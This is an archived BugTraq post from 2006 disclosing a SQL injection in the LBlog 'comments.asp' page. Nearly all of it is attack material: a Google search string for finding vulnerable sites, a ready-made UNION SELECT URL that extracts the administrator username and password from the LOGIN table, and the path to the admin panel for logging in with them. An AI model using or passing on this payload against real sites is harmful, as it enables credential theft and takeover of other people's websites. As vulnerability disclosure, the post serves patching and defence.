BugTraq
LBlog <= "comments.asp" SQL Injection Exploit Aug 20 2006 03:07PM
ChironeX FleckeriX Gmail Com
########################################################################
########

## ##

## LBlog <= "comments.asp" SQL Injection Exploit ##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##

## Credit by | Chironex Fleckeri ##

## Mail | ChironeX.FleckeriX (at) Gmail (dot) Com [email concealed] ##

## Googledork | Powered By LBlog ##

## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##

## ##

########################################################################
########

########################################################################
###########################################

#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #

########################################################################
###########################################

#################################################

#Admin Panel : http://www.target.com/path/admin #

#################################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus